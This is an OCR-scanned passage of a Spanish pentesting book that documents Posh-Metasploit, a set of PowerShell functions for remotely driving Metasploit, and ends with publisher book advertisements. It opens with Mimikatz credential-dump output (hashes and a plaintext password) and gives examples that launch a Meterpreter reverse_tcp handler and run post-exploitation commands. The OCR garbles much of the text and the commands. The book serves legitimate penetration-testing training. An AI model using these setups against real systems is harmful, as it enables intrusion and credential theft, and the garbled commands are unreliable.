S  - 1 -5-21  - 1285451244  - 1715528267 -2775765943  - 1006 

msv  : 

[00000003] 

Primary 

f  Username 

:  pablo 

4  Domain 

:  PRACTICAS-PC 

*  LM 

:  8735172c 3a77d2c 6aad3b435b51404ee 

*  NTLM 

:  512b99O09997c3b5588cafac9c0ae969 

*  SHA1 

:  ad251d5740a4690b27c7cbfa2elbc f3452041b0d 

:  tspkg  : 

4  Username 

:  pablo 

4  Domain 

:  PRACTICAS-PC 

*  Password 

:  123abc. 

wdigest  :  I 

4  Username 

:  pablo 

4  Domain 

:  PRACTICAS-PC 

_ 

4  Password 

\  123abc . 

Fix.  4.  OS:  Ejecucion  tie  la  fimcidn  Irtvoke-Mimikatz  a  troves  tie  la  PowerShell  interavtiva  (2“ parte). 


5.  Posh-Metasploit 

Posh- Metasploit  es  un  conjunto  de  modulos  y  lunciones  que  automatiza  la  interaccion  con  un 
servidor  Metasploit  via  XMLRPC.  El  objetivo  de  estos  modulos  es  la  de  ofrecer  al  pentester  una 
interaccion  remota  con  Metasploit .  pudiendo  ejccutar  cualquier  tipo  de  accion  a  traves  de  l  owet Shell 
sobre  .Metasploit. 

Posh-Metasploit  puede  ser  descargado  desde  su  Githuh  en  la  direccion  URL  https://github.com/ 
darkoperator/Posh-Metasploit. 

Posh-Metasploit  ofrece  un  paralclismo  intuitivo  con  Metasploit  Framework,  es  deeir,  viendo  los 
modulos  que  constan  la  solucion  se  puede  observar  una  equivalencia  clara.  En  otras  palabras,  quien 
ha  trabajado  con  la  consola  de  Metasploit  podra  ver  el  paralclismo  en  el  uso  del  mcidulo  C 'onsole 
de  Posh-Metasploit.  Las  categories  que  pueden  ser  encontradas  en  Posh-Metasploit  son  las  que  se 
enumeran  a  continuacion: 

Console.  Este  modulo  proporciona  las  funciones  necesarias  para  interacluar  con  el 
servidor  de  Metasploit  conto  si  estuviera  utilizando  msfconsole. 

-  Db.  Este  modulo  proporciona  al  pentester  las  funciones  necesarias  para  interacluar  con  un 
motor  de  base  de  datos,  tal  y  conto  se  haria  en  Metasploit. 

-  Jobs.  Este  modulo  proporciona  las  funciones  necesarias  para  gestionar  los  trabajos  que 
pueden  ser  utilizados  en  Metasploit. 
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-  Module.  Este  modulo  proporciona  una  gran  cantidad  de  funciones  que  ayudan  a  gestionar 
los  diferentes  modulos  con  sus  diferentes  tipos. 

Plugin.  Este  modulo  gestiona  los  diferentes  plugins  que  pueden  ser  anadidos  al  framework. 
por  ejemplo  el  plugin  de  Nessus.  Nmup  o  Nexpose. 

-  Posh-Metasploit.  Este  modulo  gestiona  las  sesiones  con  el  servidor  remote,  desde  la 
creacion  de  estas  hasta  la  desconexion  y  eliminacion  de  la  sesion. 

-  Session.  Este  modulo  proporciona  funciones  que  permiten  gestionar  estas.  desde  su 
enumeracidn  hasta  la  interaccion. 

-  Variables.  Este  modulo  proporciona  funciones  para  gestionar  las  variables  globales  del 
framework  y  almacenar  la  configuration. 

Console 

El  modulo  console  presenta  todas  las  funciones  necesarias  para  interaetuar  con  la  consola  de 
Metasploit  en  remoto.  Quien  ha  utilizado  la  consola  de  Metasploit  se  hace  una  idea  de  todo  lo  que 
se  puede  realizar  con  ella,  pero  generalmente  lo  que  aportaran  las  funciones  de  PowerShell  con  este 
modulo  es  la  posibilidad  de  interaetuar  con  la  consola  como  si  se  estuviera  delante  de  ella.  Para 
interaetuar  con  la  consola  se  debe  tener  una  sesion  con  el  servidor  creada  previamente.  El  modulo 
consta  de  6  funciones.  las  cuales  como  se  mcnciono  anteriormente  permiten  la  gestion  e  interaccion 
con  la  consola  de  Metasploit.  A  continuacion  se  describen  brcvemente  las  funciones: 


Funcion 

Descripcion 

G  et- MSF Console 

Esta  luncion  enumera  las  consolas  que  se  encucntran  activas  por 

parte  del  usuario  sobre  el  servidor  de  Metasploit 

N exv- MS FC onsole 

Esta  funcion  crea  una  nueva  consola  sobre  el  servidor  de  Metasploit. 
Para  crear  una  nueva  consola  de  puede  utilizar  New-MSFConsole 

Id  <identificador  sesion> 

Removc-MSFConsole 

Esta  funcion  elimina  una  consola  abierta  en  el  serv  idor  de 

Metasploit.  Para  eliminar  una  consola  se  puede  ejecutar  Remore- 
MSFConsole  Id  <identificador  sesion>  -Consoleld  <identificador 
consola  que  se  obtiene  al  crearla> 

Write -  MSF  Console 

Esta  funcion  permite  escribir  texto  a  traves  de  la  sesion  de  consola. 

Un  ejemplo  seria  IVrite-MSFConsole  Id  < identifu  ador  sesidn> 

-C  onsoleid  <identificador  consola>  -Text  "comando".  Puede 
resultar  interesante  enviar  “'n"  despues  del  texto 

Invoke - 

MSFConsoleCommand 

Esta  funcion  permite  ejecutar  comandos  a  traves  de  una  consola 

remota.  Para  lograr  esto  se  ejecuta  Invoke- MSFConsoleCommand 
—Id  <identifieador  se$ion>  -Consoleld  <identificculor  consola> 

- Command  comando  Para  poder  leer  la  salida  de  la  ejecucion  del 
comando  se  debe  utilizar  la  funcion  Read-MSFConsole 
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Funcion 

Descripci6n 

Read-MSF Console 

Esta  funcidn  permite  leer  la  salida  de  una  ejecucion  de  un  comando. 
Un  ejemplo  seria  Read- MSFConsole  —Id  <identificador  sesion> 
-Console Id  <identificador  comola> 

Tablet  4.01:  Fund  ones  de  Console  en  Posh- Metasploit. 


En  el  sitio  web  de  Posh-Metasploit  se  pueden  enconirar  diversos  ejemplos  sobre  la  ejecucion  de 
estas  funciones  sobre  un  entorno  real  de  Metasploit. 

En  la  imagen  se  puede  visualizar  como  sc  invoca  el  comando  Jobs  que  proporciona  los  trabajos  en 
background  o  servicios  que  tiene  montado  el  usuario  en  dicha  sesion.  Para  poder  leer  el  resultado  de 
Invoke- MSFConsole  Command  se  hace  uso  de  la  funcion  Read- MS F Consol e . 


Ir  .‘Oke-nSPCc^ 

jc-IeComrre-d  -Id  ;  -Ccnroltld  C  -Cc-mtanr 

v.'f  :.e 

15-*-::*. 

192.165.iie4 

i- II 

r  -  . 

.I*t3 

FraBe/crk; 

let  sol* 

1  E  p  -  :-it  u.lti  1$  11 

1  ifJSLti 

.  rll-ZZ 

'iSiCTT 

:-5e55i:TlU 

;  lil. -63. i.l£4 

Fig.  4.09 :  Ejetnplo  de  ejecucion  de  comandos  a  f raves  de  Invoke- MSFConsaieC  omnutnd. 


Db 

Este  modulo  proporciona  funciones  que  permiten  la  gestion  de  Metasploit  con  la  base  de  datos 
que  tenea  configurada  en  el  servidor.  Esto  puede  ser  util  para  almacenar  intormacion,  por  cjemplo 
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Funcion 

Descripcidn 

Set-MSFDBHost 

Esta  funcion  permite  crear  un  nuevo  host  en  la  base  de  datos.  si 
este  no  se  encuentra  presente.  Por  ejemplo,  Set-MSFDBHost  -Id 
<identificador  sesion>  -IPAddress  <direccion  IP  ho,t> 

Get-MSFDBHosf 

Esta  funcion  devuelve  un  l.stado  de  los  hosts  que  se  encuentran  en 
la  base  de  datos  de  Metasploit 

Remove-MSFDBHost 

Esta  funcion  permite  elimmar  uno  o  varios  hosts  de  la  base  de 
datos  de  Metasploit 

Get-MSFDBServcie 

Esta  funcion  permite  obtener  un  listado  de  servicios  de  la  base  de 
datos  de  Metasploit 

Set-  MSFDBServcie 

Esta  funcion  permite  anadir  un  nuevo  servicio  a  la  base  de 

datos  de  Metasploit.  Un  ejemplo  seria  Set-MSFDBServiee -Id 
<  identificador  sesion>  -Port  <puerto  servicio>  -Protocol  TCP 
IPAddress  <direccinn  IPsen  icio>  -State  <estado.  por  ejemplo 

Open> 

R  e  mo  ve-  MSFDBSer\ ■ cie 

Esta  luncion  permite  eliminar  un  servicio  de  la  base  de  datos  de 
Metasploit 

Sel-MSFDB  Vuln 

Esta  funcion  permite  anadir  una  nueva  vulnerabilidad  en  la  base 

de  datos  de  Metasploit.  Un  ejemplo  seria  Set-MSFDBVuln-ld 
< identificador  sesidn>  -Port  <puerto  de  producto.  por  ejemplo 

22>  -Protocol  TCP  Name  "Nombre  vulnerabilidad.  por  ejemplo 
SSH  Vuln  "  IPAddress  <direccion  IP  del  RHOST>  -References 
(  VE,  BID,  OSVDB.  etcetera> 

Get-MSFDBVuln 

Esta  funcion  devuelve  un  listado  con  las  vulnerabUidades 
que  se  encuentran  en  la  base  de  datos  de  Metasploit.  Estas 
vulncrabilidades  pueden  haberse  anadido  gracias  a  otra 
herramienta  y  la  importacion  de  sus  datos,  como  por  ejemplo 
Nessus 

Remove-MSFDB  Vuln 

Esta  funcion  permite  eliminar  una  vulnerabilidad  de  la  base  de 
datos  de  Metasploit 

Get -  MSFDBNote 

Esta  funcion  devuelve  un  listado  de  las  notas  que  se  hayan  anadido 
a  la  base  de  datos  de  Metasploit 

Set-MSFDBNote 

Esta  funcion  permite  anadir  o  modificar  una  nota  en  la  base  de 
datos  de  Metasploit 

Remove-MSFDBNote 

Esta  funcion  permite  eliminar  una  nota  de  la  base  de  datos  de 
Metasploit 
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Funcion 

Descripci6n 

Get-MSFDBEvent 

Esta  funcion  devuelve  un  listado  de  eventos  registrados  en  la 
sesion  de  Metasploit .  Es  decir,  cada  vez  que  el  usuario  ejecuta  un 
comando,  una  consola  se  inicia,  etcetera,  se  registra  un  evento. 
Con  esta  funcion  se  pueden  visualizar  los  distintos  eventos  de  la 
sesion.  Un  ejemplo  seria  Get-MSFDBEvent  id  <identificador 
sesion>  -Limit  <registros  a  consultar> 

Set-MSFDBCred 

Esta  funcion  permite  anadir  una  credcncial  a  la  base  de  datos  de 
Metasploit.  Un  ejemplo  seria  Set-MSFDBCred  -Id  <identificador 
sesion>  - Port  <puerto>  -Username  <nombre  usuario>  -Password 
<contrasena>  -Type  Password -I PA ddress  <direccion  IP  host> 

Get-MSFDBCred 

Esta  funcion  devuelve  un  listado  de  credenciales  recopiladas  en  la 
base  de  datos  dc  Metasploit 

Get-MSFDBLoot 

Esta  funcion  devuelve  un  listado  de  los  loot  rccopilados  en  la  base 
de  datos  de  Metasploit 

Get-MSFDBStatus 

Esta  funcion  devuelve  el  estado  de  la  base  de  datos.  La 
informacion  interesante  aqui  es  el  driver  configurado 

Connect -  MSFDB 

Esta  funcion  realiza  la  conexion  a  la  base  de  datos.  La  instruccion 
para  llevar  a  cabo  la  conexion  es  Connect- MSFDB  DBFlost 
<direccibn  IP  host  DB>  -DatabaseName  <nombre  DB> 

- Credentials  (Get-Credential  msf) 

Disconnect-MSFDB 

Esta  funcion  realiza  la  desconexion  de  la  base  de  datos 

Get -  MSFDB  War space 

Esta  funcion  devuelve  el  listado  de  workspaces 

Get - 

MSFDBCurrentWorspace 

Esta  funcion  devuelve  el  listado  actual  de  workspaces  sobre  el  que 
Metasploit  se  esta  ejecutando 

New -  MSFDB  Workspace 

Esta  funcion  permite  anadir  un  nuevo  workspace 

Remove- MSFDB  Workspace 

Esta  funcion  elimina  un  workspace  el  cual  se  debe  indicar 

Set- MSFDB  Workspace 

Esta  funcion  anade  o  modifica  un  workspace 

Import-  MSFDBData 

Esta  funcion  permite  importar  informacion  de  escaneos  con  otras 
herramientas  a  la  base  de  datos  de  Metasploit .  Un  ejemplo  seria 
Import- MSFDBData  -Id  <identificador  sesion >  -File  <report. 

nessus> 

Tabla  4. 02:  Funciones  de  Dh  en  Posh-Metasp/uit. 


Jobs 

Este  modulo  proporciona  al  pentester  las  funciones  necesarias  para  gestionar  trabajos  o  Jobs  que 
Metasploit  lanza  por  debajo.  Por  ejemplo,  cuando  se  lanza  un  modulo  de  tipo  exploit  con  interaction 
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del  usuario,  se  suele  Ianzar  un  servicio  que  espera  las  peticiones  del  usuario.  esto  seria  un  job  A 
continuacion  se  descnben  las  funciones  que  gestionan  \os  Jobs  en  Metasploit: 


Funcion 

Descripci6n 

Gel- MSF  Jab 

Esta  luncion  devuelve  un  listado  de  los  Jobs  que  se  encuentran 
ejecutando  en  la  sesion  de  Metasploit.  Un  ejemplo  seria  Get-MSFJob  -Id 
<identi/icador  sesidn> 

Get-  MSFJoblnfo 

Esta  funcion  devuelve  un  listado  de  los  Jobs  que  se  encuentran  ejecutando 
en  la  sesion  de  Metasploit.  Como  anadido  la  informacidn  que  se  devuelve 
son  todos  los  valores  que  se  encuentran  configurados  en  el  Datastore  de 

dicho  job 

Remo  ve-  MSF  Job 

Esta  funcion  elinuna  un  job  que  se  encuentra  ejecutando  en  Metasploit 

Tabla  4.03:  Funciones  de  Jobs  en  Pash-Metasptoti. 


En  la  imagcn  se  puede  visualizar  un  ejemplo  de  recuperation  de  Jobs  de  Metasploit  y  la  information 
que  se  obtiene.  Es  importanie  ver  la  informacion  recuperada  del  Datastore ,  donde  se  puede  visualizar 
la  configuration  del  modulo  concreto. 


-  :  II  r 


ri£  4- I0:  Recuperation  de  information  de  los  job  que  ejecuum  en  Metasploir 


Module 

Este  modulo  proporciona  diferentes  funciones  que  permiten  gestionar  e  interactuar  con  los  diferentes 
modulos  de  Metasploit.  Estas  funciones  ayudan  a  configurer  ciertos  modulos  y  poder  ejecutarlos  a 
traves  de  la  sesion  como  si  el  usuario  estuviera  conectado  a  la  consola. 

A  continuacion  se  deseribcn  las  diferentes  funciones  con  algunos  ejemplos: 


Funcion 

Descripcion 

Get-  MSF  Mo  duleStats 

Esta  funcion  proporciona  un  listado  de  estadisticas  sobre 
el  numero  de  modulos  de  cada  tipo  que  sc  encuentra 
disponible  en  la  version  de  Metasploit.  Un  ejemplo  seria 
Get-MSFModuleStats  -Id  <identificador  sesion> 
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Funcidn 

Description 

Invoke- MSF  Module  Re  load 

Esta  funcion  recarga  todos  los  modulos  de  Metasploit. 
actualizando  el  niimero  de  modulos  si  alguno  hubiera  sido 
aiiadido  desde  la  ultima  carga.  Un  ejemplo  seria  Invoke- 
MSFModuleReload  -Id  <identificador  sesidn> 

Get-MSFA  iixiliaryModule 

Esta  funcion  recupera  todos  los  modulos  de  tipo  Auxiliary 
que  hay  cargados  en  Metasploit.  Un  ejemplo  para 
recuperar  modulos  que  hagan  fuerza  bruta  al  login  podria 
ser  Get-MSFA uxiliaryModule  -Id  <identificador  sesidn>  | 
where  { S.name  - like  "*login*”f 

Get -  MSFPost  Module 

Esta  funcion  recupera  todos  los  modulos  de  tipo  Post  que 
se  encuentran  cargados  en  Metasploit 

Get -  MSF  Exploit  Module 

Esta  funcion  recupera  todos  los  modulos  de  tipo  Exploit 
que  se  encuentran  cargados  en  Metasploit 

Get -MSF Payload  Module 

Esta  funcion  recupera  todos  los  modulos  de  tipo  Payload 
que  se  encuentran  cargados  en  Metasploit 

Get-MSFNOPS 

Esta  funcion  recupera  todos  los  modulos  de  tipo  Nops  que 
se  encuentran  cargados  en  Metasploit 

Get-MSFModulelnfo 

Esta  funcion  devuelve  informacion  sobre  un  modulo 
concreto  que  debe  ser  indicado  a  traves  de  los  argumentos 
Name  y  Type.  Un  ejemplo  seria  Get-MSFModulelnfo  -Id 
<  idem  t  ificador  sesion>  -Name  multi/handler  - Type  exploit 

Get - 

Esta  funcion  devuelve  informacion  sobre  los  modulos  de 
tipo  payload  que  son  compatibles  con  un  modulo  de  tipo 
exploit  en  concreto.  Un  ejemplo  de  esta  funcionalidad 

MSFExploitCompatiblePayload 

seria  Get- MSF  Exp! o  itCompatiblePayload  -Id 
<identificador  sesidn>  - Name  windows/smh/psexec 

Get-MSFModuleOptions 

Esta  funcion  devuelve  todas  las  opciones  y  detalles  con 
los  que  esta  configurado  un  modulo.  Se  muestran  tanto 
las  opciones  basicas  como  las  avanzadas.  Un  ejemplo 
seria  Get-MSFModuleOptions  -Id  <identificador  sesidn> 
-Name  windows/meterpreter/reversejep  -Type payload 
-  Verbose 

Get - 

Esta  funcion  enumera  que  sesiones,  por  ejemplo  de 
Meterpreter ,  ya  abiertas  en  Metasploit  son  compatibles 
con  el  modulo  de  Post-Exploitation  que  se  indica  como 

MSFPostCompatihleSession 

argumento.  Un  ejemplo  seria  Gei-MSFCompatihleSession 
-Id  <identificador  sesion>  -Name  'multi/general/ 
execute  " 
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Funcion 

Descripcidn 

I n  voke- MSF  Module 

_ _ 

Esta  funcion  permite  ejecutar  un  modulo  pasandole 

la  configuracion  a  traves  del  parametro  Options.  Un 
ejemplo  seria  Invoke-MSFModule  -Id  <identificador 
sesidn>  -Type  exploit  -Name  "multi/handler"  -Options  & 

{  PAYLOAD "-"windows/meterpreter/reverse  tep "LH 
OST"=  ’7 92. 168.56. 101  " LPORT'^4444  J-  Verbose 

Tabla  4.04:  Funciones  tie  Module  en  Posh-Metasploit. 


F.sta  categoria  o  modulo  de  Posh-Metasploit  permite  gestionar  e  interactuar  con  diferentes  plugins 
dcsarrollados  para  mejorar  la  experiencia  de  Metasploit  durante  un  test  de  intrusion. 

Por  ejemplo,  se  pueden  utilizar  plugins  que  integren  herramientas  como  Nessus.  Nmap  a  Nexpose 
con  el  fin  de  aprovechar  los  resultados  obtenidos  en  la  fase  de  explotacion.  A  continuacion  se  detallai. 
las  funciones  que  aporta  e!  modulo: 


Funcion 

Descripeion 

Get-MSFLoadedPlugin 

Esta  funcion  proporciona  un  listado  de  todos  los  plugins  cargados 

en  Metasploit.  Un  ejemplo  seria  Get-MSFLoadedPlugin  -Id 
<  ident  ificador  sesion> 

Register- MSFPIugin 

Esta  funcion  permite  registrar  un  plugin  y  de  este  modo  disponer 
de  los  comandos  que  el  plugin  aporta.  Su  comando  equivalente 
en  Metasploit  seria  load  <plugin>.  Un  ejemplo  seria  Register- 
MSF Plugin  -Id  <identificador  sesion>  -Name  nessus.  y 
posteriormente  para  ver  si  el  plugin  se  ha  cargado  correctamenle 
se  lanzaria  Get-MSFLoadedPlugin  -Id  <identificador  sesion> 

LfnRegister-MSFPIugin 

Esta  funcion  permite  descargar  o  eliminar  un  plugin  ya  cargado. 

Su  comando  equivalente  en  Metasplot  seria  unload  <plugin> .  Un 
ejemplo  seria  Un  Register-  MSF Plugin  Id  <ident  ificador  sesion> 
-Name  nessus 

Tablo  4.05 :  Fane  tones  de  Plugin  en  Posh-Metasploit. 


Posh 

Este  modulo  lleva cl  nombre  identico  delframework.  Permite  la gestibn  de  las  sesiones  con  el  servidor 
remoto  de  Metasploti  via  XMLRPC.  desde  la  creacion  de  dichas  sesiones  hasta  la  desconexion  y 
eliminacion.  A  continuacion  se  describen  las  diferentes  funciones  que  forinan  parte  del  modulo: 
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Funcion 

Description 

New- MSFServerSession 

Genera  una  nueva  sesion  dado  un  MSFRPCD .  Un  ejemplo  seria 
New-MSFServerSession  -CompnterName  1 92.168. 1. 1 04  - Port 
55553  -Credentials  (Get-Credential  msfi 

Set-MS FA  nth  Token 

Configure  sobre  una  sesion  existente  un  Authentication  Token 

Get -  MSFServerSession 

Esta  funcion  devuelve  un  listado  de  las  sesiones  que  hay  abiertas 

con  el  servidor  remoto 

Remove-  MSFServerSession 

Esta  funcion  elimina  una  sesion  existente  en  el  servidor.  La  sesion 
debe  indicarse  a  traves  del  parametro  Id ,  por  ejemplo  Remove - 
MSFServerSession  - Id  2  —Verbose 

Get-MSFCorelnfo 

Esta  funcion  devuelve  informacion  sobre  la  version  Core  de  una 
sesion  de  Metasploit 

Get- MS  FA  uthToken 

Esta  funcion  devuelve  informacion  sobre  el  token  de  autenticacion 
de  una  sesion 

New-  MSFAuth  Token 

Esta  funcion  genera  un  nuevo  y  permanente  token  de  autenticacion 
en  Metasploit 

Remo  ve-  MS  FA  nth  Token 

Esta  funcion  elimina  un  token  de  autenticacion  conocido. 

indicandole  a  traves  del  parametro  -Token 

Get-MSFThread 

Esta  funcion  devuelve  un  listado  de  hilos  que  se  ejecutan  en  el 

servidor 

Remove-  MSFThtvud 

Esta  funcion  detiene  el  hilo  en  ejecucion 

Get-Pos  h  MSFers  ion 

Esta  funcion  devuelve  la  version  actual  de  Posh-Metasploit 

Tablet  4.06:  Ft  me  tones  del  modulo  Posh-Metasploit  en  Posh-Metasploit. 


Session 

Este  modulo  proporciona  las  funciones  que  permiten  gestionar  las  sesiones,  tras  una  explotacion 
exitosa,  que  se  tiene  en  Melasploit.  La  enumeracion  de  sesiones  o  como  interactuar  con  ellas  son 
las  funciones  interesantes  del  modulo  Session  de  Posh-Metasploit.  A  continuacion  se  detallan  las 
funciones  que  fonnan  parte  del  modulo: 


Funcion 

Descripci6n 

Get-MSFSession 

Esta  funcion  devuelve  un  listado  de  las  sesiones  que  se 
encuentran  abiertas  tras  una  explotacion.  Dcntro  de  los 
valores  que  devuelve  la  funcion  se  encuentran  algunos 
interesantes  como  SessionID,  viaexploit,  session  host, 
via _payIoad.  platform  o  type  entre  otros.  Un  ejemplo 
seria  Get-MSFSession  - Id  <identificador  sesion> 
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~ - 

Funcion 

Descripcion 

Write-MSFMeterpreterConsole 

Esta  funcion  permite  escribir  texto  a  traves  de  la 

sesion  de  Meterpreter  obtenida  tras  la  explotacion 
de  una  vulnerabilidad.  Un  ejemplo  seria  Write- 
MSFMeterpreterConsole  -Index  0  -Session Id  <ID  sesion 
Meterpreter>  -Text  " sysinfo'n " 

Read-MSFMeferpreterConsoIe 

Esta  funcion  permite  leer  resultados  obtenidos  tras  la 
escritura  con  Write-MSFMeterpreterConsole.  Es  decir. 
con  una  funcion  se  escribe  a  traves  de  la  sesion  para 
ejecutar  una  orden  y  con  la  otra  funcion  se  recupera  la 
salida  de  lo  escrito  en  consola.  Un  ejemplo  seria  Read- 
MSFMeterpreterCorisole  Id  <identificador  sesidn> 
-Sessionld  <1D  sesion  Meterpreter > 

Get- 

Esta  funcion  devuelve  un  listado  de  modulos  de  tipo 
post  que  son  compatibles  con  la  sesion  que  el  usuario 

MSFSessionCompatPostModnle 

tiene  en  la  maquina  comprometida.  Un  ejemplo  seria 
Get-MSFSessionCom pat  Post  Module  -Id  <identi/icador 
sesion>  - Sessionld  <1D  sesion  Meterpreter> 

Invoke-  MSFMeterpreterCommand 

Esta  funcion  ejecuta  un  comando  a  traves  de  la  consola 
sobre  una  sesion  de  Meterpreter.  El  comando  debe  ser 
propio  de  Meterpreter.  Un  ejemplo  valido  es  Invoke - 
MSFMMeterpieter Command  Id  <identiftcadar  sesion> 
-Sessionld  <1D  sesion  Meterpreter>  - Command  “ getuid  " 

Write-  MSFShellConsole 

Esta  funcion  escribe  un  texto  a  traves  de  una  sesion 
de  shell.  Un  ejemplo  seria  Write- MSFShellConsole 
-Id  <identificador  sesion>  -Sessionld  <fD  sesion 
Meferpreter>  -Text  " ping  -c  2  127.0.0.  I  n  " 

Read-  MSFShellConsole 

Esta  funcion  permite  leer  la  salida  de  los  comandos 
ejecutados  a  traves  de  Write- MSFShellConsole.  Un 
ejemplo  sen  a  Read- MSFShellConsole  -Id  <identificador 
sesion>  - Sessionld  <1D  sesion  Meterpreter> 

Remove- MSFSes.s  ion 

Esta  funcion  finaliza  la  sesion  del  payload  que  sc  indica  a 
traves  del  parametro  Sessionld 

Tabla  4.07:  Funciones  de  Variables  en  Posh-Metasploit. 

A  continuacion  se  puede  visualizar  la  ejecucion  de  la  funcion  Invoke-MSFMeierpreterCommatuL 
con  la  que  se  consigue  ejecutar  un  cotnando  a  traves  de  una  sesion  de  Meterpreter.  La  salida  se 
muestra  automaticamente.  por  lo  que  se  puede  decir  que  esta  funcion  automatiza  el  proceso  de 
entrada  y  salida  de  datos,  es  decir,  una  sesion  mas  mteractiva.  El  ejemplo  puede  encontrarse  en  la 
documentacion  de  Posh-Metasploit. 
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Invoke -IIS  Ft-' 

‘•tett  pfctcrConnrc ~ :  -Id  C  -Sessicnld  1  -Crirns-r. 

result 

s jccess 

MSMost 

192. 16S. 1.104 

Sessicnld 

Cornmc'id 

get  J  is 

Fig.  4.1 1:  Ejecucion  de  coma  rubs  de  Meterpreter  a  trails  de  1  nvoke-MS F Mete rpictc  (‘Command. 


Variables 

Este  modulo  se  encarga  de  interactuar  con  las  variables,  sobretodo  globales,  del  Framework. 
Ademas.  permite  gestionar  el  almacenamiento  de  las  con figuraci ones  que  el  usuario  haya  hecho 
sobre  el  entomo.  lo  cual  equipara  a  la  ejecucion  del  comando  save  en  Metasploit.  A  continuation  se 
describen  las  funciones  del  modulo: 


Funcion 

Descripcidn 

Set - 

MS F Global  Variable 

Esta  funcion  permite  interactuar  con  el  Dataslore  global  de  variables. 
Equivale  a  la  utilization  del  comando  setg  <variable>  <valor>  en 
Metasploit .  Un  ejemplo  seria  Set-MSFGlobalVariable  -Id <identificador 
sesion>  - Name  LHOST -Value  192. 16S. 56.101 

Remove - 

MSFGlobal  Variable 

Esta  funcion  permite  desasignar  una  variable  global.  Un  ejemplo  seria 
Remove- MSFGlobal  Variable  - Id  <identificador  sesidn>  - Name  LHOST 

Save-MSFConfig 

Esta  funcion  almacena  en  la  carpeta  personal  del  usuario  la 
configuration  de  Metasploit  en  ese  instante.  Es  decir,  todas  las  variables 
asignadas  en  los  modulos.  todos  los  cambios  rcalizados,  el  modulo 
activo,  etcetera.  Un  ejemplo  seria  Save-MSFConfig  - Id  <identificador 

sesidn> 

Tab  la  4.  OH:  Funciones  de  Variables  en  Posh- Metasploit. 
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Estos  libros  se  pueden  adquirir  en  la  web:  Https :  //www .  0XWORD .  com 


El  DNI  electrdmco  esta  entre  nosotros,  desde  hace  bastante 
tiempo  pero,  desgraciadamente,  el  uso  del  mismo  en  su  faceta 
electronica  no  ha  despegado.  Todavia  son  pocas  las  empresas  y  los 
particulares  que  sacan  provecho  de  las  funcionalidades  que  ofrece. 
En  este  libro  Rames  Sarwat*  de  la  empresa  Smart  Access,  desgrana 
los  fundamentos  tecnologicos  que  estan  tras  el,  y  muestra  como 
utilizar  el  DNl-e  en  entornos  profesionales  y  particulares.  Desde 
autenticarse  en  los  sistemas  informaticos  de  una  empresa,  hasta 
desarrollar  aplicaciones  que  saquen  partido  del  DNl-e. 

Rames  Sarwat  es  licenciado  en  Informatica  por  la  Universidad 
Politecnica  de  Madrid  y  socio  fundador  y  director  de  Smart  Access. 
Anteriormente  ejercio  como  Director  de  Consultoria  en  Microsoft.. 


Anuario  ilustrado  de  seguridad  informatica,  anecdotas  y 
entrevistas  exclusivas...  Casi  todo  lo  que  ha  ocurrido  en  seguridad 
en  los  ultimos  doce  anos,  esta  dentro  de  "Una  at  dia:  12  anos  de 
seguridad  informatica  ”. 

Para  celebrar  los  dieciseis  anos  ininterrumpidos  del  boletin  Una 
al  dia ,  hemos  realizado  un  recorrido  por  toda  una  decada  de  virus, 
vulnerabilidades,  fraudes,  alertas,  y  reflexiones  sobre  la  seguridad 
en  Internet.  Desde  una  perspective  amena  y  entretenida  y  con 
un  diseno  sencillo  y  directo.  Los  16  afios  de  Una  al  dia  sirven 
de  excusa  para  un  libro  que  esta  compuesto  por  material  nuevo, 
revisado  y  redactado  desde  la  perspectiva  del  tiempo.  Ademas  de 
las  entrevistas  exclusivas  y  las  anecdotas  propias  de  Hispasec. I 


Maxima  Seguridad  en  Windows: 
Secretos  Tecnicos 

7*  rmciAfl-  NovujU*  v 
Sergio  dc  los  Santos 


Combate  las  a**enajMt  de  hoy  en  Windows 
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Hacking  y  seguridad 
en  comunicaciones  moviles 
GSM/GPRS/UMTS/LTE 


Jos*  Pico  Garcia 
David  Percr  Conde 


Pentesting  con  PowerShe/I 


La  informacion  es  clave  en  la  preparation  de  un  test  de  penetracion. 
Siii  ella  no  es  posibie  determinar  que  atacar  ni  como  hacerlo.  Y  los 
buscadores  se  han  convertido  en  herramientas  fundamentales  para 
la  mineria  de  datos  y  los  procesos  de  inteligencia.  Sin  embargo, 
pese  a  que  las  tecnicas  de  Google  Hacking  lleven  aiios  siendo 
utilizadas,  quiza  no  hayan  sido  siempre  bien  tratadas  ni  transmitidas 
al  publico.  Limitarse  a  emplear  Google  Dorks  conocidos  o  a  usar 
herramientas  que  automaticen  esta  tarea  es,  con  respecto  al  uso  de 
los  buscadores.  lo  mismo  que  usar  una  herramienta  como  Ness  us, 
o  quiza  el  autopwn  de  Metasploii ,  y  pensar  que  se  esta  realizando 
un  test  de  penetracion.  Por  supuesto,  estas  herramientas  son  utiles, 
pero  se  debe  ir  mas  alia,  comprender  los  problemas  encontrados. 
ser  capaces  de  detectar  otros  nuevos...  y  combinar  herramientas. 


Hoy  en  dia  no  sufrimos  las  mismas  amenazas  (ni  en  cantidad  ni 
en  calidad)  que  hace  algunos  ahos.  Y  no  sabemos  euales  seran  los 
retos  del  mahana.  Hoy  el  problema  mas  grave  es  mitigar  el  impacto 
causado  por  las  vulnerabilidades  en  el  software  y  la  complejidad 
de  los  programas.  Y  eso  no  se  consigue  con  una  guia  “tradicional” 
Y  mucho  menos  si  se  perpetuan  las  recomendaciones  “de  toda 
la  vida”  como  “cortafuegos”,  “antivirus”  y  “sentido  comun”. 
^Acaso  no  disponemos  de  otras  amias  mucho  mas  potentes?  No. 
Disponemos  de  las  herramientas  “tradicionales”  muy  mejoradas. 
cieno.  pero  tambien  de  otras  tecnologias  avanzadas  para  mitigar  las 
amenazas.  El  problema  es  que  no  son  tan  conocidas  ni  simples.  Por 
tanto  es  necesario  leer  el  manual  de  instrucciones.  entenderlas...  y 
aprovecharlas... 


Mas  de  3.000  mi  Hones  de  usuarios  en  mas  de  200  paises  utilizamos 
diariamente  las  comunicaciones  moviles  GSM/GPRS/UMTS 
(2G/3G)  para  llevar  a  cabo  conversacioncs  y  transferencias  de 
datos.  Pero,  <*,son  seguras  estas  comunicaciones?.  En  los  ultimos 
ahos  se  han  hecho  publicos  multiples  vulnerabilidades  y  ejemplos 
de  ataques  practicos  contra  GSM/GPRS/UMTS  que  han  puesto  en 
evidencia  que  no  podemos  simplemente  contlar  en  su  seguridad.. 

Descubra  en  este  libro  euales  son  las  vulnerabilidades  y  los 
ataques  contra  GS M/GPRS/ UMTS  (2G/3G)  y  el  estado  respecto  a 
la  nueva  tecnologia  LTE ,  comprenda  las  tecnicas  y  conocimienios 
que  subyacen  tras  esos  ataques  y  conozca  que  puede  hacer  para 
